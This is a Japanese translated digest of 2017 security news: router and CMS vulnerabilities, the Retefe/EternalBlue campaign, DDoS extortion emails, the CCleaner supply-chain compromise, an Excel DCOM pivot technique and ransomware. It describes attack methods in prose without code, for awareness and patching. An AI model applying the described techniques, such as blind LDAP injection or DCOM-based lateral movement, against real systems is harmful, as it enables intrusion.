     「我々は製品のセキュリティを大変深刻に受け止めている、そして、潜在的セキュリティ脆弱性のインスタンスを監視するBugcrowdと密接に作業してきている」と、更に「我々は、潜在的な脆弱性の同定と大量の修正のリリースに関しBugcrowdと共同作業している。これが、先週あなたが大量の修正に遭遇した理由である」と、Netgearのスポークスマンは発言している。
     この会社は、将来、公開をより均等に配布するためにプロセスを自動化するように作業中であると発言している。
     Netgearは、伝えられるところによると、脆弱性の技術的主張と、それに続く調整されたアドバイザリを認識する時に、故意にモタモタしたとして、過去にBeyond SecurityのRathausによる批判に直面している。
     Trustwaveの観点からは、Netgearは正しい方向に向いている。「我々は、かなり長い期間、彼らの責任ある公開プロセスを介してNetgearと共同作業した、そして、バグバウンティ・プログラムへ彼らが現在参加していることを含め、彼らが途方もなく成熟してきたことを見てきた」と、Rakhmanovは発言している。
     この一年で、バグのパッチを緊急発進させたネットワーク機器企業はNetgearだけではない。先月、独立系の研究者Pierre Kimは、D-Linkによって製造されたワイアレスルータに粗1ダースの緊急の脆弱性があることを発見した。4月、IOActiveの研究者は、Linksysルータのモデルに、サードパーティーに再起動やロックアウトを可能にしたり、影響を受けるデバイスから重要なルータのデータを抽出することを可能にする20を超える脆弱性を発見した。ASUSは、人気のあるRTルータの30モデルに脆弱性が存在していることを5月に報告した。
     Rathausは、ルータとIoTベンダは、数年間、製品のセキュリティ、テスト、ハードニング(【訳注】 脆弱性を減らすことでシステムのセキュリティ堅牢にすること(Wikipediaより))に関して全く努力していないと、彼は主張している。
     「今日、Shodanのようなサイトを使用して、あなたは、如何なる認証も、デバイスのIPアドレスの代わりになる如何なる情報も要求することなくデバイスのセキュリティ侵害を許す深刻なバグに全く脆弱な数百から数十万のデバイスを配置することができる」と、Rathausは発言している。
     Rathausは、この企業の研究者達は、今年だけで60もの類似の認証バグを報告していると発言している。
     「時々、ユニークな(新しいタイプの脆弱性)が現われるが、多くの場合、それは何度も繰り返される同じタイプの脆弱性である」と、「ベンダは、製品を公開する前に、これらのバグを見つけ出すために十分な時間をかけていない」と、彼は発言している。


    WordPressの3つのプラグインに0-Dayの脆弱性
    BleepingComputer : News>Security (2017/10/02)
     数分前にWordPressセキュリティ企業Wordfenceによってリリースされたセキュリティ警告によると、ハッカーはWordPressのサイト上にバックドアをインストールするために3つの0-Dayのフローを悪用している。
     この0-Dayは、3つのWordPressプラグイン(Appointments, RegistrationMagic-Custom Registration Forms, Flickr Gallery)に作用する。
     このプラグインの製作者は攻撃ベクトル(3つ全てのプラグインに同じ方法で作用するPHPオブジェクト・インジェクション脆弱性)を修正するためのアップデートをリリースした。

    0-Dayは、脆弱性のあるサイトにバックドアをインストールすることをハッカーに可能にする

     「この脆弱性は、攻撃者が、リーモート・ファイル(PHPバックドア)を取ってきて、それを彼らの選択した場所に保存することを脆弱なWebサイトに発生させることを可能にする」と、Wordfenceの研究者Brad Haasは発言している。
     Haasによると、この脆弱性を悪用することは滑稽なほどに簡単である(犠牲者のサイトに送信するHTTP POSTリクエストを内部に脆弱性攻撃プログラム・コードを包含することを要求する)。攻撃者は脆弱性攻撃プログラムの引き金を引くために、そのサイトに認証してもらう必要はない。
     Flickr Galleryプラグインを実行しているサイトに関しては、ハッカーは、そのサイトのルートURLをターゲットにしなければならない。他の二つに関しては、ハッカーはadmin-ajax.phpファイルでPOSTリクエストを狙わなければならない。
     このハッカーが、サイトを欺いてバックドアをダウンロードさせると、このハッカーは数分以内にサイトを乗っ取ることができる。

    21,000サイトに脆弱性がある

     Wordfenceは、一連のハッキングされたサイトを調査し、これまでの悪用の証拠を発見した後、0-Dayを検出したと発言している。
     良いニュースと悪いニュースがある。良いニュースは、合わせて凡そ21,000インストールと、これらのプラグインに人気がないことである。
     悪いニュースは、この0-Dayは悪用することが簡単であり、他のハッカーは、この脆弱性攻撃プログラム・コードを推定するために、このプラグインの変更履歴を解析して模倣することができることである。
     これらの0-Dayの中核となる脆弱性は、CVSSv3 severity scale(共通脆弱性評価システムCVSSv3)で 9.8/10 のスコアである。これは大変高い値であり、「緊急」に分類される脆弱性である。
     Webサイトの所有者は、これらのプラグインをパッチされたバージョンにアップデートすることができるし、安全なサイトにするために、これらのプラグインをアンインストールすることもできる。以下が、この脆弱性を修正したプラグインのバージョンである。

    ・ Appointments、製作: WPMU Dev (修正版 2.2.2) [~ 9,000 インストール]
    ・ Flickr Gallery、製作: Dan Coulter (修正版 1.5.3) [~ 4,000 インストール]
    ・ RegistrationMagic-Custom Registration Forms、製作: CMSHelpLive (修正版 3.7.9.3) [~ 8,000 インストール]


    Internet Explorerのバグは、URLアドレスバー中にユーザがタイプしたことをリークする
    BleepingComputer : News>Security (2017/09/27)


    ロードは中止された。
    あなたの心を読もう。あなたは、此処に行きたかった:
    http://BleepingComputer.com

     MicrosoftのInternet Explorerは、ユーザが、URLアドレスバー中にタイプしていることを検出することを、ペテンにかけようとするサイトに可能にする深刻なバグによる影響を受けている。
     これは、ユーザが移動しようとしているかもしれない新しいURLを含むが、検索用語も、IEが自動的にBing検索を介して処理することも含まれている。
     セキュリティ研究者Manuel Caballeroによってスポットを当てられたこのバグは、標的型攻撃中の偵察行動に使用することができるし、データも、オンライン広告主によって収穫されるのでプライバシー・リスク引き起こす。

    バグは簡単に悪用することができる

     このバグは、IEが(1)悪意あるHTMLオブジェクトタグ付きや、(2)ソースコード中に互換メタタグを特徴として備えているページをロードした時に発生する。この二つの条件を満足することは大変簡単である。
     条件 1: 攻撃者は、ハッキングされたサイト中に悪意あるHTMLオブジェクトタグを隠蔽することができる、あるいは、カスタムHTMLやJavaScriptコードを広告主に可能にする広告を介して、それをロードすることができる。
     条件 2: X-UA-Compatibleは、そのページをレンダリングするのに、どのバージョンのInternet Explorerを選択するのかをWeb制作者に可能にするドキュメントモード・メタタグである。インターネット上の殆ど全てのサイトは、互換メタタグを持っている。

    バグはIEが惑わされることで発生する

     Caballeroによると、JavaScriptコードが悪意あるオブジェクトHTMLタグ中で実行されると、「そのロケーションオプジェクトは混乱し、それ独自のロケーションの代わりにメインのロケーションを戻す。」
     噛み砕いて言うと、これは、これは悪意あるオブジェクトHTMLタグ(これはロードされ、ページ内部を隠蔽されることができる)が、それまでメイン・ブラウザウィンドウで利用可能であったリソースと情報にアクセスできることを意味している。
     このバグの技術的記事に於いて、(ユーザが)「アドレスバーにタイプしたことを知る」ために、悪意あるオブジェクトは、「ユーザがメインページを離れている間に、そのオブジェクトのlocation.hrefを取得する」ことができると、Cavalleroは発言している。
     Cavalleroは、[IEでだけ動作する]デモページをセットアップした。攻撃のデモビデオもまた、以下に埋め込まれている。

    攻撃のデモビデオ

     Cavalleroは、このバグをMicrosoftに通知していない。Bleeping Computerは、コメントを出すためにMicrosoftに手を差し伸べた。
     今迄、Caballeroは、ユーザが悪意あるページのタブを終了した場合でさえ、IEのバックグラウンドに存続し、実行し続けることを、悪意あるJavaScriptコードに可能にするIEのバグを発見している。このバグは、ユーザが悪意あるサイトを訪問した後暫くしてMonero(仮想通貨の一つ)を採掘するために、ユーザのコンピュータリソースを活用する仮想通貨採掘管理ソフトを配布するための悪意ある広告キャンペーンによって乱用される可能性がある。そこで、ユーザのコンピュータはスローダウンし、ユーザのプロセッサの早期摩耗を発生する。
     更に、Caballeroは、Microsoftの最新のブラウザEdge[1, 2, 3, 4]中に多くのセキュリティ・バグを発見している。この内の幾つかを、Microsoftは解決しているが、他は未だである。


    FacebookをハイジャックするFacelikerが急増
    Graham Cluley : News (2017/09/27)
     研究者は、Facelikerとして知られるFacebookをハイジャックする脅威が活発化していると報道している。
     "HTML/Rce.Gen," "JS:Exploit.BlackHole.PR,", "JS/FBJack.I!tr,"としても知られるFacelikerは、少なくとも2013以降活動している。
     これは、特定のコンテンツに関し、偽りの「いいね」を生成することで、ユーザのFacebookアカウントを巧みに操作することで知られるトロイである。McAfee Labsは、このマルウェアの機能に関する補足を明らかにしている

     「Facelikerは、ユーザが悪意ある、あるいはセキュリティ侵害されたWebサイトを訪問した時、ユーザのブラウザに感染する。次に、Facebookアカウントをハイジャックするので、ユーザは、あるコンテンツを「いいね」と思ってクリックしているつもりでも、このマルウェアはそのクリックをリダイレクトする。これは、ユーザの認識も同意もなく、別の「いいね」ボタンを代わりにクリックしたことになるので、本質的に各ユーザはクリック詐欺の共犯者にさせられてしまう。」

     このような行動は、彼らの製品の評判を高める目的で、彼らの「サービス」をコンテンツ・クリエーターに販売しているFacelikerハンドラーを勢いづかせることになる。
     これは、今日、世の中にモラルのないコンテンツ制作者の数が増加しているかのように見える。実際、2017年の第一、第二四半期の間に、McAfeeは、検出されたマルウェア・バイナリの総数のうち、Facelikerの挙動が2%から8.9%へ増加していることを検出している。


    発見されたマルウェア中のFacelikerの百分率(【訳注】 横軸 Q2-17 は、2017年第二四半期の意味)

     Facelikerの増加は十分厄介である。しかし、利益を生み出す機会を与えられたので、この脅威が近いうちに去ることは絶対にないだろうと、McAfee Labsの副社長Vincent Weaferは考えている。

     「Facelikerは、ソーシャルメディアや、今日ますます広まっているアプリケーションベースのコミュニケーションを活用し巧みに操作している。アプリケーションや新しい記事を作成することは、より一般的になっており、受け入れられ、友人間で当然の事になっているようなので、未知の行動者は、価値や真実さえ見抜く方法に、こっそり、影響を与えることができる。」

     Facelikerのような脅威を防御するには、ユーザは、彼らがオンラインでどのようなサイトを訪問しているのか、どのようなリソースから、そのWebでホストされているファイルをダウンロードしていのかに用心する訓練をすべきである。彼らはまた、彼らのパスワードを盗む能力のあるマルウェアを防止する手段として、Facebookアカウントや、他のソーシャルメディア・プロファイルを二要素認証で間違いなく保護すべきである。


    8年間、ハッカーはJoomla中のパスワードを盗むことのできるフローを悪用可能だった
    Bitdefender : Hot For Security (2017/09/25)
     過去8年間、緊急の脆弱性がJoomla CMSのコード中に潜在していた。この脆弱性は、悪意あるハッカーが、全てのユーザのログイン認証(管理者に属する物を含む)を盗むことを可能にするものであった。
     CMSとはコンテンツ・マネージメント・サービスである。これは、訪問者が見たいWebページや画像を見る機会を保証するために、あなたのWebサイトの全てのコンテンツを管理するソフトウェアである。そのようなものなので、CMSは、多くの企業にとって、彼らが顧客にコンテンツを配信する方法の必須の部分である。
     それ故、あなたのWebサイトのCMSで、新しく発見された脆弱性をパッチし続けることは大変重要である。
     この深刻なセキュリティホール(先週リリースされたJoomla v3.8でパッチされた)は、ドイツのセキュリティ企業RIPS Techによって公開された。
     今まで知られていなかったインジェクション脆弱性は、JoomlaのLDAP(Lightweight Directory Access Protocol。【訳注】 ネットワーク機器やユーザーなどの情報を管理するディレクトリサービスへ接続するためのプロトコル(@ITネットワーク用語事典より))認証コード中に存在していた。このソフトウェアの影響を受けるバージョンがユーザ・インプットを適切にサニタイズ(【訳注】 秘密にしておかなければならない情報を除去すること)しないので、この脆弱性はWebサイトのCMSログイン・ページを介して悪用することが可能であった。研究者の説明として:

     LDAPクエリーに使用されるユーザ名認証のインプット・サニタリゼーションの欠如は、敵対者がLDAP検索結果のセットを改竄することを可能にする。ワイルドカード文字の使用や様々な認証エラーメッセージを観察することによって、攻撃者は、文字列毎に認証を推測するペイロードの列を送信することで、徐々にログイン認証をまさに検索することができる。

     攻撃が成功すると、ハッカーは管理者のログイン認証を盗むことができるようになり、Webサイトは完全に制御されることになる。
     Joomlaは、世界で最も人気のあるCMSの一つであり、数百万のWebサイトによって使用されている。結果として、管理者パスワードをリークすることを可能にするあらゆる脆弱性は、驚くべきこととして考えなければならない。しかしながら、この発見をさらにショックにしていることは、ハッカーが(8年前にリリースされた)Joomlaのバージョン1.5以降このフローを悪用することが可能であったことである。
     Joomlaはオープンソース・ソフトウェアであり、セキュリティホールに関する脆弱性は定期的に検証されている、そして、誰も今迄この緊急のフローを発見していなかった。オープンソース・ソフトウェアのアイデア(誰もが脆弱性を検証しチェックすることを可能にしている)は、素晴らしいアイデアである。しかし、誰もが50万行のコード中のセキュリティホールを探しまわることができるというだけで、全てのバグが発見されるということを、あるいは、あなたのWebサイト全体をセキュリティ侵害に導くことが可能な緊急の脆弱性が、タイミングよく発見されることを意味していない。
     今回の場合、ありがたいことに、Joomlaは研究者がこの脆弱性について通知した後、タイムリーにその脆弱性を確認し修正した。あなたは最新のCMSにアップデートし、将来の緊急のセキュリティ問題を見守ることを確実にすることによって、あなたは、サイトがセキュリティ侵害されるリスクを減少するための本分を尽くすことができる。
     このJoomlaセキュリティホールの発見に8年掛かったこと、その間に、悪意あるハッカーがこの脆弱性を悪用していたか否か、決して分からないことは残念である。


    EternalBlue脆弱性攻撃プログラムがRetefeバンキング・トロイに使用されていた
    Kaspersky : ThreatPost (2017/09/22)
     Retefeバンキング・トロイの背後にいる犯罪者は、を彼らのマルウェアに対して新しいコンポーネントとして米国国家安全保障局(NSA)が作成した脆弱性攻撃プログラムEternalBlueの使用を追加していた。
     このアップデートは、パッチされたWindowsの脆弱性に対してRetefeをSMBv1攻撃を身につけた最新のマルウェアにしており、最新のトレンドを示していると、Proofpointの研究者は発言している。今年早く、Flashpointの研究者は、TrickBotバンキング・トロイが同様にEternalBlueモジュールを追加したことを観察した。
     Retefeは、DridexやZeusのような類似のトロイに、スケールや評価では決して及ぶものではないが、その興味ある実装とオーストリア、スウェーデン、スイス、日本、最近では英国と一貫して地域に焦点を当てることで注目されていると、研究者は発言している。
     「オンライン・バンキング・セッションをハイジャックするためにWebインジェクションに依存するDridexや他のバンキング・トロイと異なり、Retefeは、様々なプロキシサーバー(しばしば、TORネットワーク上にホストされる)を介してターゲットにした銀行の、行き帰りのトラフィックをルーティングすることによって行動する」と、木曜日のテクニカル投稿でProofpointは、その調査を説明している。
     過去数カ月間に渡り、研究者は、悪意あるMicrosoft Officeドキュメントを含む迷惑メールから成る新しいRetefeキャンペーンの波を観測してきた。添付ファイルは埋め込まれたPackage Shell ObjectsもしくはObject Linking and Embedding Objects(一般的には、Windowsショートカット ".lnk" ファイル)を含んでいると、研究者は発言している。
     ユーザがショートカットを開き、表示されるセキュリティ警告を受け入れたなら、PowerShellコマンドは、リモートサーバ上にホストされている自己解凍形式のZipアーカイブのダウンロードを開始する。このZipアーカイブは難読化されたJavaScriptインストーラを含んでいる。
     研究者がJavaScriptインストーラの難読化を解除した時、彼らは幾つかの設定セッション・パラメータを発見した。ここ数週間で、ターゲットにされたネットワークに横方向に拡散するために使用することのできるEternalBlue脆弱性攻撃プログラムを実装するスクリプトへの参照パラメータ"pseb:"が追加されたと、研究者は発言している。
     「我々は最初、9月5日に"pseb:"パラメータを観察した。"pseb:"設定は、EternalBlue脆弱性攻撃プログラム(そのコードの殆どは公に利用可能なプルーフ・オブ・コンセプト(概念の実証)からの借り物)を実装している」と、研究者は記述している。
     Proofpointは、この敵によって使用されたEternalBlueパラメータはまた、そのインストレーションと犠牲者の設定の詳細をログする機能と、FTPサーバにデータをアップロードする機能を含んでいると発言している。
     EternalBlueのこの実装に関するペイロード設定は、リモートサーバからPowerShellスクリプトをダウンロードする。これは、Retefeをインストールする埋め込まれた実行ファイルを含んでいると、研究者は発言している。
     「我々は、EternalBlue脆弱性攻撃プログラムの追加で、最初のターゲットをセキュリティ侵害したなら、ネットワーク中で効果的な伝搬のための機会を作成するところの、このグループからの活発さを増す標的型攻撃を観察している」と、Proofpointは記述している。
     研究者のメモ、9月20日、"pseb"セクションは、EternalBlueログイン機能だけを含む新しい"pslog"セクションで置き換えられた。「このインストレーションは、しかしながら、EternalBlueを介して更に横方向に拡散するための責任を負う"pseb"モジュールを欠いている。それ故、無限拡散ループを回避している」と、彼らは発言している。
     研究者は、企業がEternalBlue脆弱性(CVE-2017-0144)に対する完全なパッチを間違いなく適用するように促している。「企業は、IDS(Intrusion Detection System、不正侵入検知)システムとファイアーウォールで関連するトラフィックをブロックし、eMailゲートウェイで悪意あるメッセージをブロックすべきである」とProofpointは追加している。


    DDoS攻撃脅迫グループが数千の企業に身代金の要求を送信している
    BleepingComputer : News>Security (2017/09/22)
     Phantom Squadの名前を使用しているDDoS脅迫者グループは、世界中の数千の企業に対して膨大なスパム(犠牲者が要求される身代金を支払はない場合には、9月30日にDDoS攻撃すると脅迫)を送信し続けている。
     身代金の要求を広めているeMailは、セキュリティ研究者Derrick Farmerによって最初に発見された。この脅威は9月19日に開始され、以降継続中のようである。

    ハッカーは僅か700$の身代金を探している

     このeMailは一つの簡単な脅迫(企業に0.2 Bitcoin(~720$)を支払うように、さもなければ、9月30日に彼らのWebサイトを停止させる準備をすると告げている)を含んでいる。


    Phantom Squad DDoS脅迫eMailのサンプル 

     通常、このようなeMailによる脅迫は、受信した企業が支払わない場合に、脅迫者が攻撃を実行するために、一企業ずつ僅かな数の企業に対して送信される。
     今回、このグループは、他の形式のマルウェアを拡散する従来のスパムキャンペーンに従って、同時に複数の相手に対してeMailを無闇矢鱈に送信しているかのようである。
     このため、このeMailと身代金要求を検証した数人の専門家は、このグループが同時に多くの標的にDDoS攻撃を起動するための射撃能力を所有していないので、十中八九愚かな犠牲者が支払ってくれることを希望した脅迫戦略を使用しているという結論に達した。

    脅迫者達は頭の回転がよろしくない

     このeMailスパムの波の大きさは、多くの専門家を驚かせた。その衝撃は、直ちにソーシャルメディア[1234]とWebマスターフォーラム(システム管理者が、脅威を取り扱う方法に関する支援と意見を探しに行く場所)上の反応となって現れた。
     Bleeping Computerは、この大きさのスパム攻撃の波に関する一般的な考えを得るためにセキュリティ企業数社に働きかけた。
     「ボリュームの点から、どのように広がるかは不確かであるが、それらは確実に多くの人々をスパミングするだろう」と、Cloudflare(【訳注】 コンテンツデリバリーネットワークや分散型ドメイン名サーバシステムを提供するアメリカ合衆国の企業(Wikipediaより))のTrust & Safetyの責任者Justin Paineは、Bleeping Computerに告げている。
     「我々は、今までにPhantom Squad eMailを報告してきた5人の顧客を持っている」とし、更に「これら天才達は、メジャーなDDoS緩和企業用の noc@ アドレスに対してさえ身代金脅迫を送信している」と、彼は付け加えている。

    脅迫者達はeMailテキストを「再利用」している

     Radwareの技術陣は類似のレポートを受け取ったので、この会社は独自のセキュリティ警告を発行したほどである。
     Radwareのセキュリティ研究者Daniel Smithは、この脅迫者達は実際のPhantom Squad(2015年の冬に様々なゲームネットワークを引きずり倒したDDoS攻撃者のグループ[12])ではない可能性があると指摘している。
     Smithは、この脅迫文が、2017年6月にArmada Collectiveの名前を使用した別の脅迫者グループが使用したものと殆ど同一であることに気が付いた。DDoS攻撃の脅威を介して企てられたこの脅迫もまた、単なる脅しであることが証明された。それであるにも拘わらず、幾つかは成功した。
     「私が興味を抱いた部分は、先月の身代金の要求額と比較して身代金額が低いことである」と、「先月、Anonimousの名前で知られる偽のRDoS(【訳注】 Ransom DDoS、DDoS攻撃を伴うサイバー脅迫)グループは、幾つかの銀行に100 Bitcoinの身代金を要求していた」と、SmithはBleeping Computerに告げた。

    専門家たちは、このグループがDDoS攻撃を起動できるとは信じていない

     これはransom DDoS (RDoS、DDoS攻撃を伴うサイバー脅迫)攻撃の漸次的な進歩(グループは、業種内部の少数の企業グループをターゲットにすることから、複数の企業から少額の支払いを引き出すことを期待して多数のターゲットに移行している)を示している。
     「これは、最新のRDoSキャンペーンが出現したということである」と、「RDoS攻撃が一段落した後の2016年春、グループは彼ら自身をArmada Collectiveと呼んで出現したが、彼らの手口は明らかに変更されていた。Armada Collectiveであると主張するこのグループは、最早小さな数の犠牲者をターゲットにしていない。代わりに、サンプル攻撃を起動することなく一度に多数の犠牲者をターゲットにした」と、Smithは発言している。
     「結果として、社会不安と悪名高い名前を悪用することによって数千ドルを得ることが可能になった。2016年と2017年に出現した他の幾つかの模倣グループは、New World Hackers, Lizard Squad, LulzSec, Fancy Bear, Anonymousのようなグループの名前を利用している。」
     「一連のdenial-of-service攻撃を起動するために、このグループは巨大なリソースを要求する。それ故、グループが多数の脅迫文を送信する時、彼らは一般的にサイバー攻撃を遂行することはないだろう」と、Smithは発言している。
     Smithの意見は、Paine(この人は最近、「このグループ=スパムからの身代金要求」そして、「この模倣者からの空虚な脅迫、中身のない攻撃」とツイートした)によっても共有されている。

    犠牲者は当局に脅迫行為を通報すべし

     Japan CERT(JPCERT、一般社団法人 JPCERT コーディネーションセンター)は、当局に、このeMailを通報してもらうことによって、インチキの要求の取り扱い方法を企業に通知するために、セキュリティ警告をリリースした。
     本日、他のシステム管理者やセキュリティ研究者に身代金脅迫を信じないように知らせるために、セキュリティ研究者Brad Duncanもまた、ISC SANSフォーラムに警告を発表した。


    CCleanerマルウェア重大事故。あなたが知る必要のあることと、削除方法
    BleepingComputer : News>Security (2017/09/18)
     これは、CCleaner 5.33.6162の32-bitバージョンによってインストールされたマルウェアに関する簡単なガイドとFAQである。発生したことの完全な要約に関しては、我々のこれ以上はないCCleanerに関する報道を読みなさい。

    何が起きたのか?

     未知の悪しきグループがCCleanerの基盤をセキュリティ侵害した。
     この攻撃者は、CCleaner 5.33.6162 と CCleaner Cloud 1.07.3191の32-bitバージョンにマルウェアを追加した。
     このマルウェアを追加されたCClenaerのバージョンは、8月15日から9月12日までの間、ダウンロードすることが可能になっていた。

    誰が感染したのか?

     上記期間に影響を受けたバージョンをダウンロードしインストールした全ての人々。
     Avastは、感染させられたマシンの数は227万と見積もっている。

    どのようにすれば感染したことが分かるのか?

     CCleanerの感染させられたバージョンをインストールすると、HKEY_LOCAL_MACHINE\SOFTWARE\Piriform\Agomo にレジストリのキーが作成される。このキーの下に、MUID と TCIDと名付けられた二つのDate値が存在する。これは、インストールされたFloxif感染によって使用される。


    セキュリティ侵害されたCCleanerによって作成されたレジストリ キー

     Registry Editorを使用してAgomoキーに移動し、これらのキーが存在しているか否か確認しなさい。存在しているのであれば、あなたは、このマルウェアに感染している。
     注意。以下に見られるように、バージョン 5.34へのアップグレードは、WindowsレジストリからAgomoキーを削除しない。このアップグレードは、悪意ある実行ファイルを正当な実行ファイルに置き換えるので、このマルウェアは最早存在しなくなる(【訳者補注】 後述されていますが、このマルウェアはCCleaner実行ファイル内部に存在しています。実行ファイルをアップデートすることでマルウェア自体が削除されます)。


    アップグレード後も存在しているレジストリ キー

    Floxifマルウェアは何を実行するのか?

     Floxifと名付けられているこのマルウェアは、感染したコンピュータから、コンピュータ名、インストールされているソフトウェアのリスト、稼働プロセスのリスト、最初の3つのネットワーク・インターフェース用のMACアドレス、各コンピュータをある程度同定する一意のIDのようなデータを収集する。
     このマルウェアは、他のマルウェアをダウンロードし実行することもできるが、Avastは、攻撃者達が、この機能を使用した形跡を発見していないと発言している。

    FloxitもしくはCCleanerマルウェアを、どのように削除するのか?

     このマルウェアは、CCleaner実行ファイルそれ自体に埋め込まれている。CCleanerを v5.34にアップデートすると今迄の実行ファイルとマルウェアは削除される。CCleanerは自動アップデートシステムを持っていないので、ユーザは、CCleaner 5.34を手動でダウンロードしインストールする必要がある。
     Avastは、CCleaner Cloudユーザにアップデートを既に押し付けており、そのユーザ達は問題ないはずであると発言している。このクリーンなバージョンは、CCleaner Cloud 1.07.3214 である。

    他に何か?

     このマルウェアは、ユーザが管理者権限を使用している場合だけ実行される。あなたが低い権限のアカウントを使用して CCleaner 5.33 をインストールしたのであれば、あなたは感染していない。あなたがWindows 7 Home Premiumを実行している場合は、あなたのメイン・アカウントは十中八九、管理者権限である。そして、あなたが、このバージョンのCCleanerをインストールしたのであれば、感染していると考えるべきである。
     それ故、バージョン5.34にアップデートすることが推奨されている。

    何故アンチウィルス・ソフトは、この感染を捕獲できなかったのか?

     マルウェアを含むCCleanerのバイナリは正当なデジタル証明書を使用して署名されていた。


    研究者は、決してパッチされない虞のあるD-Linkルータのセキュリティホールを明らかにした
    Sophos : Naked Security (2017/09/12)
     あなたが、D-Link DIR-850L AC1200 Dual Band Gigabit Cloudルータを持っているのであれば、我々は、幾つかの面であなたにとって悪いニュースを持っている。
     研究者Pierre Kimによると、この製品は、Kimが「このルータを即座にインターネットから切り離す」ことを所有者に推奨している、大変深刻な10のセキュリティ脆弱性を持っている。
     これは厄介なように見えるが、もっと悪い。まず、Kimは、D-Link(【訳注】 台湾の情報通信機器会社)と最初に連携することなく、このフローを公開した。彼が、昨年他の製品(DWR-932Bモバイル・ホットスポット・ルータ)で通知した問題に対して、この企業が殆ど反応しなかったので、この通常ではないステップを採用したと発言している。  第二に、D-Linkの緩慢で無応答(そして、AC1200ルータは数カ月前製造中止になったという事実)は、決して最新のフローを完全にパッチすることはないという可能性の増大である。
     Kimは、このフローを0-Dayとして説明しているが、彼が不快な詳細中にそれらの存在を今明らかにしたので、厳密には最早真実ではない(0-Dayは、公開されていないい未パッチのフローである)。
     Kimの要約:

     基本的に、すべてのものLANからWANまでセキュリティ侵害されていた。カスタムMyDlinkクラウド・プロトコルでさえ乱用されていた。

     これらは以下を含む:

    ・ 攻撃者が新しいイメージをアップロードすることを可能にするrevAハードウェア用ルータのファームウェアに関する保護の欠乏。revAは、ハードコードされたパスワードを持っている。
    ・ 多くのクロスサイト・スクリプティング(XSS)のフロー。
    ・ このデバイス クラウド・プロトコル実装中でシツコイほど繰り返される弱点。
    ・ revBルータはバックドア アクセスを許可する。
    ・ DNS設定を保護するための認証の欠乏。

     これは、D-Linkが製品セキュリティでトップニュースになった最初のことではない。Naked Securityは、最近数回レポート(DIR-820Lでの2015問題と、CVE-2017-6206に指定された2017年始めからのフローの集まりを含む)した。
     2017年の初め、D-Linkは米国連邦取引委員会を困らせてさえいた(そのIPカメラとルータ中のフローを修正しないと、この会社が主張したことに関して米国連邦取引委員会が提訴したこと)。
     修正されない可能性のあるフローを公開することに、ある人々はKimを不快に思うかもしれないが、反論は、それらが存在していることを知ることは、無知である恐ろしさより好ましいというものである。
     この問題の核心は、この会社が2013年に製造し2016年まで販売した製品を製造中止にしたが、ユーザは、その後数年間使用し続けるということにある。
     この会社が、その製品が(【訳者補注】 後継機に)取って代わられた日の後に発見されたフローを修正しないのであれば、その所有者達は我慢しなければならない。もともと、そのような企業が、その場にいるべきではないが、法的には、企業は将来に渡りフローをパッチし続けることを義務付けられてはいない。
     残念なことに、ルータは、その箱に「消費」期限を付けて販売されていない、多分彼らは、すべきだろう。


    Excelを嫌うもう一つの理由: Excelのマクロは攻撃をピボットする事を支援する
    The Register : Security (2017/09/12)
     ホワイトハット(【訳注】 システムのセキュリティホールを見つけて、悪用することなくシステム管理者にそれを知らせる"良い"ハッカー(Weblioより))は、あなたが、Microsoft Excelを使用して、あるマシンから他のマシンに攻撃をピボットできるか否かを十分観察した、そして、あなたは彼が発見したことを好まないだろう。
     この研究者(SpecterOps(@enigma0x3)のMatt Nelson)は、不正確なDefaultの起動とアクセス・パーミッションを発見したと記述している。これは、マクロベースの攻撃が、その犠牲者と対話する必要がないことを意味している。
     簡潔に言うと: Excel.ApplicationはDCOMを介して露出する; それは起動とアクセス・パーミッションのセットを検証しない; 攻撃者は最初のセキュリティ侵害に関して幾つかの他の方法を発見する必要があるだろうが、Microsoft Office Macroセキュリティは、このピボットを停止しないだろう; そして、Excel.Applicationは、遠隔から起動(そして、対話的に)させられることが可能になる。
     これは、リモート攻撃者が、悪意あるマクロを含むExcelスプレッドシートを押し付けることができることを意味している。そして、「VBAは、Win32 APIアクセスを可能にしているので、この可能性は様々なシェルコードランナーにとってエンドレスである。」
     その概念の実証で、Nelsonは特に邪悪なものを実行していない。彼は単に、calc.exeを起動したのだが、それはあまりにも簡単である。
     「新しいマクロを作成し、それに任意の名前を付ける、あなたのコードに追加し、次に、それを保存する。この例では、私のマクロ名は'MyMacro'であり、このファイルを .xls フォーマットで保存している。」
     このデモ中の計算機は、Excelのチャイルドプロセスとして発生させられるが、Nelsonは、「VBAは、そのOSとの相互作用の観点から多くのことを提供しているので、チャイルドプロセスを発生させず、代わりに、他のプロセスを挿入することを可能にしている」と注意している。
     「最後のステップは、遠隔からExcelオブジェクトをクリーンアップし、ターゲットのホストからペイロードを削除することである」と、彼は追加している。
     これは、Local Administratorグループ権限を持つユーザに制限されているが、そのベクトルは十分深刻なまま残っている。結局、これは、そのグループ中のマシンが既にセキュリティ侵害されているとNelsonが考えるピボット攻撃である。
     緩和策は存在するが、彼は、それらの緩和策が面倒な事態を引き起こすかもしれないと警告している。システム管理者は、Excel.Applicationを手動でリモートから起動しアクセス・パーミッションを設定することができるが、これは他のOfficeアプリケーションに影響を与える虞がある。
     他の緩和策は、その起動を編集し、discretionary access control lists (DACLs、随意アクセス制御リスト)にアクセスするためにdcomccnfg.exeを使用すること、並びに、WindowsファイアーウォールをONにすることとローカル管理者の数を制限することを含んでいる。

    ピボット(Pivot)に関する参考資料(McAfee > Secureingtomorrowより)


    1. 直接攻撃は大変多くの証拠を残す
    2. 疑うことを知らない人々は、悪意あるリンクをクリックし、マルウェアをインストールする。
    3. その攻撃は、攻撃者の起源を隠すために、感染したシステムから起動される


    Paradise身代金要求型マルウェアは、ファイルの暗号化にRSA暗号化を使用している
    BleepingComputer : News>Security (2017/09/11)
     本日、Paradiseと呼ばれる新しい身代金要求型マルウェアの犠牲者の一人が、Bleeping Computerのフォーラムに投稿し、我々が検証することのできるサンプルをアップロードした。この身代金要求型マルウェアは、決して革新的なものではないが、これは、積極的に拡散していることとRansomware as a Service (RaaS、サービスとしてのランサムウェア)なので、私は、この身代金要求型マルウェアの動作方法の簡単な解析を提供しようと考えた。
     残念ながら、Paradise身代金要求型マルウェアは、身代金を支払わずに復号することはできないし、影響を受けたユーザは、代替方法でファイルを復号することを試みるべきである。この身代金要求型マルウェアに関して支援を受けたり、論議したいのであれば、専用のParadise Ransomware Support Topicを使用しなさい。

    Paradise身代金要求型マルウェアはRansomware as a Service (RaaS)かもしれない

